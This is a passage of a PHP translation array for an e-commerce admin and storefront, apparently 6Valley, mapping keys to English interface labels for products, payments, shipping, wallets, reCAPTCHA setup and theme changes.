'Wc-327479', 'wc-327477' => 'Wc-327477', '10% OFF' => '10% OFF', 'total_Price' => 'Total Price', 'search_by_Product_Name' => 'Search by Product Name', 'limited_Stocks' => 'Limited Stocks', 'product_Name' => 'Product Name', 'product_Type' => 'Product Type', 'active_Status' => 'Active Status', 'product_must_be_approved' => 'Product must be approved', 'Ready_After_Sell' => 'Ready After Sell', 'Ready_Product' => 'Ready Product', 'generate_Code' => 'Generate Code', 'meta_title' => 'Meta title', 'meta_image' => 'Meta image', 'meta_description' => 'Meta description', 'please_provide_embed_link_not_direct_link' => 'Please provide embed link not direct link', 'product_updated_successfully' => 'Product updated successfully', 'add_Shipping' => 'Add Shipping', 'order_wise_shipping_method_status_updated_successfully' => 'Order wise shipping method status updated successfully', 'shipping_Method_deleted_successfully' => 'Shipping Method deleted successfully', 'total_Order_Amount' => 'Total Order Amount', 'due_Amount' => 'Due Amount', 'already_Settled' => 'Already Settled', 'order_Statistics' => 'Order Statistics', 'shipping_Charge' => 'Shipping Charge', 'cash_Payment' => 'Cash Payment', 'chatting_Page' => 'Chatting Page', 'chatting_List' => 'Chatting List', 'search_customers' => 'Search customers', 'send_Reply' => 'Send Reply', 'no_message_available' => 'No message available', 'some_status_buttons_are_disabled_because_the_admin_added_coupons' => 'Some status buttons are disabled because the admin added coupons', 'the_coupon_discount_bearer_is_admin' => 'The coupon discount bearer is admin', 'or_some_coupons_are_for_all_sellers' => 'Or some coupons are for all sellers', 'some_actions_are_disabled_because_the_admin_added_coupons' => 'Some actions are disabled because the admin added coupons', 'seller_Product_List' => 'Seller Product List', 'no_data_to_show' => 'No data to show', 'product_Preview' => 'Product Preview', 'view_live' => 'View live', 'total_sold' => 'Total sold', 'general_information' => 'General information', 'subcategory' => 'Subcategory', 'current_stock' => 'Current stock', 'price_information' => 'Price information', 'available_variations' => 'Available variations', 'reviewer' => 'Reviewer', 'product_Image' => 'Product Image', 'save_changes' => 'Save changes', 'general_setup' => 'General setup', 'upload_file' => 'Upload file', 'product_sku' => 'Product sku', 'delivery_type' => 'Delivery type', 'product_variation_setup' => 'Product variation setup', 'select_colors' => 'Select colors', 'select_attributes' => 'Select attributes', 'Pricing_&_others' => 'Pricing & others', 'purchase_price ($)' => 'Purchase price ($)', 'unit_price_($)' => 'Unit price ($)', 'minimum_order_qty' => 'Minimum order qty', 'current_stock_qty' => 'Current stock qty', 'discount_amount' => 'Discount amount', 'ex: 5' => 'Ex: 5', 'tax_amount' => 'Tax amount', 'tax_calculation' => 'Tax calculation', 'include_with_product' => 'Include with product', 'exclude_with_product' => 'Exclude with product', 'product_thumbnail' => 'Product thumbnail', 'colour_wise_product_image' => 'Colour wise product image', 'upload_additional_image' => 'Upload additional image', 'product_video' => 'Product video', 'product_Edit dsf' => 'Product Edit dsf', 'variant_Price' => 'Variant Price', 'request' => 'Request', 'payment_Method_Name' => 'Payment Method Name', 'payment_Info' => 'Payment Info', 'required_Info_From_Customer' => 'Required Info From Customer', 'offline_payment_method_added_successfully' => 'Offline payment method added successfully', 'input_field_Name' => 'Input field Name', 'bank_Name' => 'Bank Name', 'input_Data' => 'Input Data', 'AVC' => 'AVC', 'bank' => 'Bank', 'offline_payment_method_delete_successfully' => 'Offline payment method delete successfully', 'add_Fields' => 'Add Fields', 'input_Field_Type' => 'Input Field Type', 'string' => 'String', 'this_field_required' => 'This field required', 'reached_maximum' => 'Reached maximum', 'payment_By' => 'Payment By', 'place_Holder' => 'Place Holder', 'enter_name' => 'Enter name', 'is_Required' => 'Is Required', 'order_Verification' => 'Order Verification', 'set_minimum_order_amount' => 'Set minimum order amount', 'minimum_order_amount' => 'Minimum order amount', '($)' => '($)', 'refund_order_validity' => 'Refund order validity', '(days)' => '(days)', '07' => '07', 'add_method' => 'Add method', 'search_Method_Name' => 'Search Method Name', 'placeholder' => 'Placeholder', 'default_Method_updated_successfully' => 'Default Method updated successfully', 'default_Method_updated_failed' => 'Default Method updated failed', 'status_update_failed' => 'Status update failed', 'offline_payment_method_not_found' => 'Offline payment method not found', 'add_Offline_Payment_Method' => 'Add Offline Payment Method', 'edit_Offline_Payment_Method' => 'Edit Offline Payment Method', 'offline_payment_method_update_successfully' => 'Offline payment method update successfully', 'payment_Information' => 'Payment Information', 'Add_New_Field' => 'Add New Field', 'required_Information_from_Customer' => 'Required Information from Customer', 'add_New_Method' => 'Add New Method', 'Want_to_delete_this_item' => 'Want to delete this item', 'limited_Stock' => 'Limited Stock', 'featured_Products' => 'Featured Products', 'find_your_best_signature_product' => 'Find your best signature product', 'other_stores' => 'Other stores', 'secured_information' => 'Secured information', 'cannot_Use_0_only' => 'Cannot Use 0 only', 'N/a' => 'N/a', 'subscribe_our_newsletter_to_get_latest_updates' => 'Subscribe our newsletter to get latest updates', 'enter_captcha_value' => 'Enter captcha value', 'reCaptcha_Setup' => 'ReCaptcha Setup', 'credentials_SetUp_page' => 'Credentials SetUp page', 'turn_OFF' => 'Turn OFF', 'site_Key' => 'Site Key', 'to_get_site_key_and_secret_key_Go_to_the_Credentials_page' => 'To get site key and secret key Go to the Credentials page', 'add_a_abel_(Ex:_abc_company)' => 'Add a abel (Ex: abc company)', 'select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'Select reCAPTCHA v2 as ReCAPTCHA Type', 'im_not_a_robot_checkbox' => 'Im not a robot checkbox', 'add_Domain_(For_ex:_demo.6amtech.com)' => 'Add Domain (For ex: demo.6amtech.com)', 'check_in_“Accept_the_reCAPTCHA_Terms_of_Service”' => 'Check in “Accept the reCAPTCHA Terms of Service”', 'press_Submit' => 'Press Submit', 'copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'Copy Site Key and Secret Key Paste in the input filed below and Save.', 'Updated_Successfully' => 'Updated Successfully', 'cookies' => 'Cookies', 'OTP_&_Login' => 'OTP & Login', 'login_Url_Setup' => 'Login Url Setup', 'system_Addons' => 'System Addons', 'app_name' => 'App name', 'app_debug' => 'App debug', 'app_mode' => 'App mode', 'app_url' => 'App url', 'DB_connection' => 'DB connection', 'DB_host' => 'DB host', 'DB_port' => 'DB port', 'DB_database' => 'DB database', 'DB_username' => 'DB username', 'DB_password' => 'DB password', 'buyer_username' => 'Buyer username', '6valley-admin-demo-jhisdfhisufjifjfijqw5467' => '6valley-admin-demo-jhisdfhisufjifjfijqw5467', 545464646 => '545464646', 'get_your_zip_file_from_the_purchased_addons_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'Get your zip file from the purchased addons and upload it and activate theme with your Codecanyon username and purchase code', 'now_you’ll_be_successfully_able_to_use_the_addons_for_your_6Valley_website' => 'Now you’ll be successfully able to use the addons for your 6Valley website', 'upload_Addons' => 'Upload Addons', 'file_upload_successfully!' => 'File upload successfully!', 'are_you_sure_you_want_to_delete_the_addon' => 'Are you sure you want to delete the addon', 'you_will_lost_the_this_addon' => 'You will lost the this addon', 'do_you_want_to_change_in_addon_status' => 'Do you want to change in addon status', 'if_you_change_addon_status' => 'If you change addon status', 'some_features_will_changed' => 'Some features will changed', 'file_delete_successfully' => 'File delete successfully', 'addon_menus' => 'Addon menus', 'payment_setup' => 'Payment setup', 'sms_setup' => 'Sms setup', 'pay_your_bill_using_any_of_the_payment_method_below_and_input_the_required_information_in_the_form' => 'Pay your bill using any of the payment method below and input the required information in the form', 'select_Payment_Method' => 'Select Payment Method', 'select_a_payment_method first' => 'Select a payment method first', 'sms_gateways_configuration' => 'Sms gateways configuration', 'Payment Setup' => 'Payment Setup', 'payment_gateway_configuration' => 'Payment gateway configuration', 'payment_gateway_title' => 'Payment gateway title', 'ReCAPTCHA_Failed' => 'ReCAPTCHA Failed', 'mail_template' => 'Mail template', 'Seller_registration' => 'Seller registration', 'read_instructions' => 'Read instructions', 'shipping_method_for_In-house_deliver' => 'Shipping method for In-house deliver', 'Category_cost_successfully_updated' => 'Category cost successfully updated', 'order_Delivery_Verification' => 'Order Delivery Verification', 'Refund_Order_Validity' => 'Refund Order Validity', 'free_Delivery_Over' => 'Free Delivery Over', 'expense_Transactions' => 'Expense Transactions', 'wallet_bonus' => 'Wallet bonus', 'in_House Orders' => 'In House Orders', 'seller_Orders' => 'Seller Orders', 'in_House Products' => 'In House Products', 'total_Transactions' => 'Total Transactions', 'search_by_orders_id' => 'Search by orders id', 'download_PDF' => 'Download PDF', 'start Date' => 'Start Date', 'end Date' => 'End Date', 'total_Expense' => 'Total Expense', 'free_Delivery_Coupon' => 'Free Delivery Coupon', 'search_by_Order_ID_or_Transaction_ID' => 'Search by Order ID or Transaction ID', 'transaction_Date' => 'Transaction Date', 'expense_Amount' => 'Expense Amount', 'expense_Type' => 'Expense Type', 'business_model' => 'Business model', 'responsibility' => 'Responsibility', 'free_delivery_over_amount' => 'Free delivery over amount', 'invalid_user' => 'Invalid user', 'shop_details' => 'Shop details', 'edit_shop' => 'Edit shop', 'visit_website' => 'Visit website', 'shop_settings' => 'Shop settings', 'Ex: 10' => 'Ex: 10', 'save_informtion' => 'Save informtion', 'seller_Information' => 'Seller Information', 'seller_setup' => 'Seller setup', 'default_commission' => 'Default commission', 'default_commission (%)' => 'Default commission (%)', 'ex: 70' => 'Ex: 70', 'enable_POS_in_Seller_Panel' => 'Enable POS in Seller Panel', 'seller_can_set_own_shop_order_limit_individually' => 'Seller can set own shop order limit individually', 'need_product_approval' => 'Need product approval', 'if_the_shipping_responsibility_is_inhouse_and_product_wise_shipping_is_activated_then_this_function_will_work' => 'If the shipping responsibility is inhouse and product wise shipping is activated then this function will work', 'wallet_Bonus_Setup' => 'Wallet Bonus Setup', 'please_click_save_information_button_below_to_save_all_the_changes' => 'Please click save information button below to save all the changes', 'Want_to_enable_the_Maintenance_Mode' => 'Want to enable the Maintenance Mode', 'Want_to_disable_the_Maintenance_Mode' => 'Want to disable the Maintenance Mode', 'if_enabled_all_your_apps_and_customer_website_will_be_temporarily_off' => 'If enabled all your apps and customer website will be temporarily off', 'if_disabled_all_your_apps_and_customer_website_will_be_functional' => 'If disabled all your apps and customer website will be functional', 'by_turning_the' => 'By turning the', 'Maintenance_Mode' => 'Maintenance Mode', 'ON' => 'ON', 'all_your_apps_and_customer_website_will_be_disabled_until_you_turn_this_mode_OFF' => 'All your apps and customer website will be disabled until you turn this mode OFF', 'only_the_Admin_Panel_&_Seller_Panel_will_be_functional' => 'Only the Admin Panel & Seller Panel will be functional', 'click_on_the_map_to_see_your_location_latitude' => 'Click on the map to see your location latitude', 'click_on_the_map_to_see_your_location_longitude' => 'Click on the map to see your location longitude', 'set_how_users_of_recover_their_forgotten_password' => 'Set how users of recover their forgotten password', 'if_enabled_users_can_receive_verification_codes_on_their_registered_email_addresses' => 'If enabled users can receive verification codes on their registered email addresses', 'want_to_Turn_OFF_the_Email_Verification' => 'Want to Turn OFF the Email Verification', 'want_to_Turn_ON_the_Email_Verification' => 'Want to Turn ON the Email Verification', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_email_addresses' => 'If disabled users would not receive verification codes on their registered email addresses', 'if_enabled_users_will_receive_verification_codes_on_their_registered_email_addresses' => 'If enabled users will receive verification codes on their registered email addresses', 'if_enabled_users_can_receive_verification_codes_via_OTP_messages_on_their_registered_phone_numbers' => 'If enabled users can receive verification codes via OTP messages on their registered phone numbers', 'want_to_Turn_OFF_the_OTP_Verification' => 'Want to Turn OFF the OTP Verification', 'want_to_Turn_ON_the_OTP_Verification' => 'Want to Turn ON the OTP Verification', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_phone_numbers' => 'If disabled users would not receive verification codes on their registered phone numbers', 'if_enabled_users_will_receive_verification_codes_on_their_registered_phone_numbers' => 'If enabled users will receive verification codes on their registered phone numbers', 'if_enabled_users_can_complete_the_checkout_process_without_logging_in_to_the_system' => 'If enabled users can complete the checkout process without logging in to the system', 'want_to_Turn_OFF_the_Guest_Checkout_Mode' => 'Want to Turn OFF the Guest Checkout Mode', 'want_to_Turn_ON_the_Guest_Checkout_Mode' => 'Want to Turn ON the Guest Checkout Mode', 'if_disabled_users_must_log_in_to_the_system_to_complete_the_checkout_process' => 'If disabled users must log in to the system to complete the checkout process', 'this_number_indicates_how_much_data_will_be_shown_in_the_list_or_table' => 'This number indicates how much data will be shown in the list or table', 'if_enabled_the_download_button_from_the_App_Store_will_be_visible_in_the_Footer_section' => 'If enabled the download button from the App Store will be visible in the Footer section', 'want_to_Turn_OFF_the_App_Store_button' => 'Want to Turn OFF the App Store button', 'want_to_Turn_ON_the_App_Store_button' => 'Want to Turn ON the App Store button', 'if_disabled_the_App_Store_button_will_be_hidden_from_the_website_footer' => 'If disabled the App Store button will be hidden from the website footer', 'if_enabled_everyone_can_see_the_App_Store_button_in_the_website_footer' => 'If enabled everyone can see the App Store button in the website footer', 'if_enabled_the_Google_Play_Store_will_be_visible_in_the_website_footer_section' => 'If enabled the Google Play Store will be visible in the website footer section', 'want_to_Turn_OFF_the_Google_Play_Store_button' => 'Want to Turn OFF the Google Play Store button', 'want_to_Turn_ON_the_Google_Play_Store_button' => 'Want to Turn ON the Google Play Store button', 'if_disabled_the_Google_Play_Store_button_will_be_hidden_from_the_website_footer' => 'If disabled the Google Play Store button will be hidden from the website footer', 'if_enabled_everyone_can_see_the_Google_Play_Store_button_in_the_website_footer' => 'If enabled everyone can see the Google Play Store button in the website footer', '* multiple_zip_codes_can_be_inputted_by_comma_separating_or_pressing_enter_button' => '* multiple zip codes can be inputted by comma separating or pressing enter button', 'delivery_country_deleted_successfully' => 'Delivery country deleted successfully', 'delivery_country_added_successfully' => 'Delivery country added successfully', 'delivery_zip_code_deleted_successfully' => 'Delivery zip code deleted successfully', 'expand_cart' => 'Expand cart', 'My_Shopping_Cart' => 'My Shopping Cart', 'genuine_product' => 'Genuine product', 'please_click_the_Save_button_below_to_save_all_the_changes' => 'Please click the Save button below to save all the changes', 'customers_receive_a_verification_code_after_placing_an_order' => 'Customers receive a verification code after placing an order', 'when_a_deliveryman_arrives_for_delivery_they_must_provide_the_code_to_the_deliveryman_to_verify_the_order_delivery' => 'When a deliveryman arrives for delivery they must provide the code to the deliveryman to verify the order delivery', 'want_to_Turn_ON_Order_Delivery_Verification' => 'Want to Turn ON Order Delivery Verification', 'want_to_Turn_OFF_Order_Delivery_Verification' => 'Want to Turn OFF Order Delivery Verification', 'if_enabled_deliverymen_must_verify_the_order_deliveries_by_collecting_the_OTP_from_customers' => 'If enabled deliverymen must verify the order deliveries by collecting the OTP from customers', 'if_disabled_deliverymen_do_not_need_to_verify_the_order_deliveries' => 'If disabled deliverymen do not need to verify the order deliveries', 'if_enabled_customers_must_place_at_least_or_more_than_the_order_amount_that_admin_or_sellers_set' => 'If enabled customers must place at least or more than the order amount that admin or sellers set', 'want_to_Turn_ON_Minimum_Order_Amount' => 'Want to Turn ON Minimum Order Amount', 'want_to_Turn_OFF_Minimum_Order_Amount' => 'Want to Turn OFF Minimum Order Amount', 'if_enabled_customers_must_order_over_the_minimum_amount_of_orders_that_admin_or_sellers_set' => 'If enabled customers must order over the minimum amount of orders that admin or sellers set', 'if_disabled_there_will_be_no_minimum_order_restrictions_and_customers_can_place_any_order_amount' => 'If disabled there will be no minimum order restrictions and customers can place any order amount', 'if_enabled_the_billing_address_will_be_shown_on_the_checkout_page' => 'If enabled the billing address will be shown on the checkout page', 'want_to_Turn_ON_Billing_Address_in_Checkout' => 'Want to Turn ON Billing Address in Checkout', 'want_to_Turn_OFF_Billing_Address_in_Checkout' => 'Want to Turn OFF Billing Address in Checkout', 'if_disabled_the_billing_address_will_be_hidden_from_the_checkout_page' => 'If disabled the billing address will be hidden from the checkout page', 'if_enabled_free_delivery_will_be_available_when_customers_order_over_a_certain_amount' => 'If enabled free delivery will be available when customers order over a certain amount', 'want_to_Turn_ON_Free_Delivery' => 'Want to Turn ON Free Delivery', 'want_to_Turn_OFF_Free_Delivery' => 'Want to Turn OFF Free Delivery', 'if_enabled_the_free_delivery_feature_will_be_shown_from_the_system' => 'If enabled the free delivery feature will be shown from the system', 'if_disabled_the_free_delivery_feature_will_be_hidden_from_the_system' => 'If disabled the free delivery feature will be hidden from the system', 'by_Turning_ON_Guest_Checkout_Mode' => 'By Turning ON Guest Checkout Mode', 'by_Turning_Off_Guest_Checkout_Mode' => 'By Turning Off Guest Checkout Mode', 'user_can_place_order_without_login' => 'User can place order without login', 'user_cannot_place_order_without_login' => 'User cannot place order without login', 'invalid_access' => 'Invalid access', 'shipping_Address' => 'Shipping Address', 'and_billing' => 'And billing', 'another_address' => 'Another address', 'address_type' => 'Address type', 'choose_Payment_Method' => 'Choose Payment Method', 'back_to_shipping' => 'Back to shipping', 'redirecting_to_the_payment' => 'Redirecting to the payment', 'order_Complete' => 'Order Complete', 'john_doe' => 'John doe', 'dhaka' => 'Dhaka', 'street_1 _street_2 _street_3 _street_4' => 'Street 1 street 2 street 3 street 4', 'your_order_has_been_placed_successfully' => 'Your order has been placed successfully', 'you_order_has_been_confirmed_and_will_be_shipped_according_to_the_method_you_selected' => 'You order has been confirmed and will be shipped according to the method you selected', 'order_No' => 'Order No', 'my_Order' => 'My Order', 'estimated_Delivary_Date' => 'Estimated Delivary Date', 'packaging_order' => 'Packaging order', 'preparing_Shipment' => 'Preparing Shipment', 'order_Shipped' => 'Order Shipped', 'view_Order_Details' => 'View Order Details', 'track_Order_Result' => 'Track Order Result', 'Invalid Phone Number' => 'Invalid Phone Number', 'Enter_your_order_ID_&_phone_to_get_delivery_updates' => 'Enter your order ID & phone to get delivery updates', 'no_review' => 'No review', 'limited_stock' => 'Limited stock', 'check_All_Wishlist' => 'Check All Wishlist', 'product_refund_validity' => 'Product refund validity', 'days_after_delivery' => 'Days after delivery', 'Order_cancelation_availablity' => 'Order cancelation availablity', 'before_the_seller_confirms_the_order' => 'Before the seller confirms the order', 'shopping_details' => 'Shopping details', 'check_All_CartList' => 'Check All CartList', 'same_as_delivery_address' => 'Same as delivery address', 'no_address_is_saved' => 'No address is saved', 'update_this_address' => 'Update this address', 'please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'Please contact with deliveryman to confirm your pay and receive your order.', 'Pro Plus 32 Inch Android Smart Wifi Hd Led Tv 4k Supported' => 'Pro Plus 32 Inch Android Smart Wifi Hd Led Tv 4k Supported', 'not_reviewed_yet' => 'Not reviewed yet', 'sorry_no_review_found_to_show_you' => 'Sorry no review found to show you', 'your_order_placed_successfully' => 'Your order placed successfully', 'delete_profile' => 'Delete profile', 'enter_your_order_ID_& _phone_to_get_delivery_updates' => 'Enter your order ID & phone to get delivery updates', 'track_order_result' => 'Track order result', 'check_My_All_Orders' => 'Check My All Orders', 'tracking_status' => 'Tracking status', 'order_is_on_the_way' => 'Order is on the way', 'order_delivered' => 'Order delivered', 'order_created_at' => 'Order created at', 'guest_customer' => 'Guest customer', 'no_billing_address_found' => 'No billing address found', 'order_Invoice' => 'Order Invoice', 'shop_Name' => 'Shop Name', 'if_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site_you_can_email_us_at' => 'If you require any assistance or have feedback or suggestions about our site you can email us at', 'pending_Refund_Requests' => 'Pending Refund Requests', 'search_by_order_id_or_refund_id' => 'Search by order id or refund id', 'want_to_delete_this_customer' => 'Want to delete this customer', 'customer_Details' => 'Customer Details', 'customer_ID' => 'Customer ID', 'joined_At' => 'Joined At', 'ssl_commerz' => 'Ssl commerz', 'review_List' => 'Review List', 'search_by_Product_or_Customer' => 'Search by Product or Customer', 'choose_product' => 'Choose product', 'choose_customer' => 'Choose customer', 'from_date' => 'From date', 'to_date' => 'To date', 'no_comment_found' => 'No comment found', 'add_Fund' => 'Add Fund', 'filter_options' => 'Filter options', 'select_transaction_type' => 'Select transaction type', 'add_fund_by_customer' => 'Add fund by customer', 'refund_order' => 'Refund order', 'summary' => 'Summary', 'order_refund' => 'Order refund', 'you_want_to_add_fund' => 'You want to add fund', 'to_wallet' => 'To wallet', 'fund_added_successfully' => 'Fund added successfully', 'customer_wallet_bonus_setup' => 'Customer wallet bonus setup', 'how_it_works' => 'How it works', 'wallet_bonus_is_only_applicable_when_a_customer_add_fund_to_wallet_via_outside_payment_gateway' => 'Wallet bonus is only applicable when a customer add fund to wallet via outside payment gateway', 'customer_will_get_extra_amount_to_his_or_her_wallet_additionally_with_the_amount_he_or_she_added_from_other_payment_gateways' => 'Customer will get extra amount to his or her wallet additionally with the amount he or she added from other payment gateways', 'the_bonus_amount_will_be_deduct_from_admin_wallet_&_will_consider_as_admin_expense' => 'The bonus amount will be deduct from admin wallet & will consider as admin expense', 'bonus_title' => 'Bonus title', 'Ex: EID_Dhamaka' => 'Ex: EID Dhamaka', 'short_description' => 'Short description', 'bonus_type' => 'Bonus type', 'persentage (%)' => 'Persentage (%)', 'fixed_amount' => 'Fixed amount', 'minimum_add_amount' => 'Minimum add amount', '$' => '$', 'bonus_amount' => 'Bonus amount', 'Ex: 5' => 'Ex: 5', 'maximum_bonus' => 'Maximum bonus', 'wallet_Bonus_Table' => 'Wallet Bonus Table', 'search_by_ID_or_name' => 'Search by ID or name', 'bonus_info' => 'Bonus info', 'started_on' => 'Started on', 'expires_on' => 'Expires on', 'customer_loyalty_point_report' => 'Customer loyalty point report', 'point_to_wallet' => 'Point to wallet', 'shop_overview' => 'Shop overview', 'transaction' => 'Transaction', 'suspend_this_seller' => 'Suspend this seller', 'A/C_No' => 'A/C No', 'aready_Withdrawn' => 'Aready Withdrawn', 'order_Table' => 'Order Table', 'print_invoice' => 'Print invoice', 'payment_Reference' => 'Payment Reference', 'order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation', 'think_before_you_proceed' => 'Think before you proceed', 'order_is_already_delivered.' => 'Order is already delivered.', 'you_can_not_change_it' => 'You can not change it', 'search_by_email' => 'Search by email', 'add_new_delivery_man' => 'Add new delivery man', 'general_Information' => 'General Information', 'first_Name' => 'First Name', 'last_Name' => 'Last Name', 'identity_Type' => 'Identity Type', 'driving_License' => 'Driving License', 'company_ID' => 'Company ID', 'identity_Number' => 'Identity Number', 'deliveryman_image' => 'Deliveryman image', 'account_Information' => 'Account Information', 'total_Seller' => 'Total Seller', 'total_Seller_Products' => 'Total Seller Products', 'denied' => 'Denied', 'pending_Request' => 'Pending Request', 'average_Earning_Value' => 'Average Earning Value', 'seller_Wallet_Status' => 'Seller Wallet Status', 'wallet_Amount' => 'Wallet Amount', 'withdrawble_Balance' => 'Withdrawble Balance', 'pending_Withdraws' => 'Pending Withdraws', 'earn_From_Order' => 'Earn From Order', 'commission_Given' => 'Commission Given', 'tax_Collected' => 'Tax Collected', 'inhouse_product_sale Report' => 'Inhouse product sale Report', 'seller_product_sale_Report' => 'Seller product sale Report', 'seller_Reports' => 'Seller Reports', 'total_Deliveryman' => 'Total Deliveryman', 'total_Shop_Earnings' => 'Total Shop Earnings', 'seller-Info' => 'Seller-Info', 'refund_Rate' => 'Refund Rate', 'seller_Details' => 'Seller Details', 'back_to_seller_list' => 'Back to seller list', 'order_info' => 'Order info', 'search_by_orders_id_or_transaction_id' => 'Search by orders id or transaction id', 'in-House' => 'In-House', 'offline_Payments' => 'Offline Payments', 'ssl commerz' => 'Ssl commerz', 'active_Products' => 'Active Products', 'inactive_Products' => 'Inactive Products', 'pending_Products' => 'Pending Products', 'search_by_orders_id_or_transaction_ID' => 'Search by orders id or transaction ID', 'oder_Transaction_Statement' => 'Oder Transaction Statement', 'completed_Orders' => 'Completed Orders', 'ongoing_Orders' => 'Ongoing Orders', 'canceled_Orders' => 'Canceled Orders', 'total_Ordered_Product_Price' => 'Total Ordered Product Price', 'total_Product_Discount' => 'Total Product Discount', 'total_Coupon_Discount' => 'Total Coupon Discount', 'total_Discounted_Amount' => 'Total Discounted Amount', 'total_Delivery_Charge' => 'Total Delivery Charge', 'admin_Discount' => 'Admin Discount', 'seller_Discount' => 'Seller Discount', 'admin_Commission' => 'Admin Commission', 'seller_Net_Income' => 'Seller Net Income', 'withdraw_Request_Table' => 'Withdraw Request Table', 'once_deleted_you_will_not_be_able_to_recover_this' => 'Once deleted you will not be able to recover this', 'bank_Info_View' => 'Bank Info View', 'bank_Information' => 'Bank Information', 'holder_Name' => 'Holder Name', 'branch_Name' => 'Branch Name', 'account_Number' => 'Account Number', 'about_Our_Company' => 'About Our Company', 'root' => 'Root', 'read_Before_Change_Theme' => 'Read Before Change Theme', 'if_you_change_from_on_theme_to_another_there_are_certain_changes_that_you_need_to_maintain_and_setup_data.' => 'If you change from on theme to another there are certain changes that you need to maintain and setup data.', 'all_the_promotional_banners_from_the_website_and_user_app_will_be_clear_once_the_theme_is_changed.' => 'All the promotional banners from the website and user app will be clear once the theme is changed.', 'you_have_to_input_all_the_banners_again_for_each_section' => 'You have to input all the banners again for each section', 'there_may_be_some_features_that_are_not_available_in_other_themes.' => 'There may be some features that are not available in other themes.', 'in_these_cases_you_have_to_setup_data_for_those_features_after_changing_the_theme.' => 'In these cases you have to setup data for those features after changing the theme.', 'after_changing_any_theme_in_the_you_will_a_menu_option_with_the_menu_name.' => 'After changing any theme in the you will a menu option with the menu name.', 'Under_this_menu_you_can_setup_all_the_new_features_option_that_are_only_available_for_that_specific_theme.' => 'Under this menu you can setup all the new features option that are only available for that specific theme.', 'you_setup_those_data_from_there.' => 'You setup those data from there.', 'after_switching_the_theme_a_menu_will_appear_in_the_side_bar_with_the_theme_name_on_it' => 'After switching the theme a menu will appear in the side bar with the theme name on it', 'you_can_setup_theme_wise_required_data_from_there.' => 'You can setup theme wise required data from there.', 'you_have_switched_theme_successfully' => 'You have switched theme successfully', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for_aster_theme.' => 'Please be reminded that you have to setup data for these section for aster theme.', 'other_wise_these_section_data_would_not_function_properly_in_website_and_user_apps' => 'Other wise these section data would not function properly in website and user apps', 'Promotional_Banners' => 'Promotional Banners', 'In-House_Store_Banner' => 'In-House Store Banner', 'please_do_not_forget_to_notify_your_sellers_about_these_changes.' => 'Please do not forget to notify your sellers about these changes.', 'so_that_they_can_also_update_their_store_banners_according_to_the_new_theme_ratio' => 'So that they can also update their store banners according to the new theme ratio', 'notify_All_the_Sellers' => 'Notify All the Sellers', 'skip' => 'Skip', 'Menu' => 'Menu', 'Most_Demanded_Product' => 'Most Demanded Product', 'no_shipping_address_found' => 'No shipping address found', 'most_demanded_table' => 'Most demanded table', 'search_by_product_name' => 'Search by product name', '24 Inch Hd LED Television - Black 24 Inch' => '24 Inch Hd LED Television - Black 24 Inch', 'are_you_sure_delete_this_most_demanded_product' => 'Are you sure delete this most demanded product', 'most-demanded_product_deleted_successfully' => 'Most-demanded product deleted successfully', 'edit_most_demanded' => 'Edit most demanded', 'most_demanded_product_update_successfully' => 'Most demanded product update successfully', 'get_in' => 'Get in', 'find_us' => 'Find us', 'type_your_message_here' => 'Type your message here', 'delivery_Man' => 'Delivery Man', 'customer_Wallet' => 'Customer Wallet', 'admin_can_set_whether_wallet_will_be_available_on_customer_profile_by_enabling_or_disabling_this_button' => 'Admin can set whether wallet will be available on customer profile by enabling or disabling this button', 'want_to_Turn_ON_Customer_Wallet' => 'Want to Turn ON Customer Wallet', 'want_to_Turn_OFF_Customer_Wallet' => 'Want to Turn OFF Customer Wallet', 'if_enabled_customers_can_have_the_wallet_option_on_their_account_and_use_it_while_placing_orders_and_getting_refunds' => 'If enabled customers can have the wallet option on their account and use it while placing orders and getting refunds', 'if_disabled_customer_wallet_option_will_be_hidden_from_their_account' => 'If disabled customer wallet option will be hidden from their account', 'customer_Loyalty_Point' => 'Customer Loyalty Point', 'admin_can_set_whether_customers_will_get_loyalty_points_by_enabling_or_disabling_this_button' => 'Admin can set whether customers will get loyalty points by enabling or disabling this button', 'want_to_Turn_ON_Loyalty_Point' => 'Want to Turn ON Loyalty Point', 'want_to_Turn_OFF_Loyalty_Point' => 'Want to Turn OFF Loyalty Point', 'if_enabled_the_loyalty_point_option_will_be_available_to_the_customers_account' => 'If enabled the loyalty point option will be available to the customers account', 'if_disabled_loyalty_point_option_will_be_hidden_from_the_customers_account' => 'If disabled loyalty point option will be hidden from the customers account', 'customer_Referrer_Earning' => 'Customer Referrer Earning', 'admin_can_set_whether_customers_will_get_referral_earnings_by_enabling_or_disabling_this_button' => 'Admin can set whether customers will get referral earnings by enabling or disabling this button', 'want_to_Turn_ON_Referral_And_Earning_option' => 'Want to Turn ON Referral And Earning option', 'want_to_Turn_OFF_Referral_And_Earning_option' => 'Want to Turn OFF Referral And Earning option', 'if_enabled_customers_will_receive_rewards_for_each_successful_referral' => 'If enabled customers will receive rewards for each successful referral', 'if_disabled_customers_will_not_receive_rewards_for_successful_referral' => 'If disabled customers will not receive rewards for successful referral', 'customer_Wallet_Settings' => 'Customer Wallet Settings', 'if_the_Customer_Wallet_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'If the Customer Wallet option is disabled above all settings of this section will be unavailable', 'add_Refund_Amount_to_Wallet' => 'Add Refund Amount to Wallet', 'admin_can_set_whether_customers_will_get_refund_amount_to_wallet_by_enabling_or_disabling_this_button' => 'Admin can set whether customers will get refund amount to wallet by enabling or disabling this button', 'want_to_Turn_ON_Refund_to_Wallet_option' => 'Want to Turn ON Refund to Wallet option', 'want_to_Turn_OFF_Refund_to_Wallet_option' => 'Want to Turn OFF Refund to Wallet option', 'if_enabled_Admin_can_return_the_refund_amount_directly_to_the_customers_wallet_' => 'If enabled Admin can return the refund amount directly to the customers wallet ', 'if_disabled_Admin_needs_to_return_the_refund_amount_manually' => 'If disabled Admin needs to return the refund amount manually', 'add_Fund_to_Wallet' => 'Add Fund to Wallet', 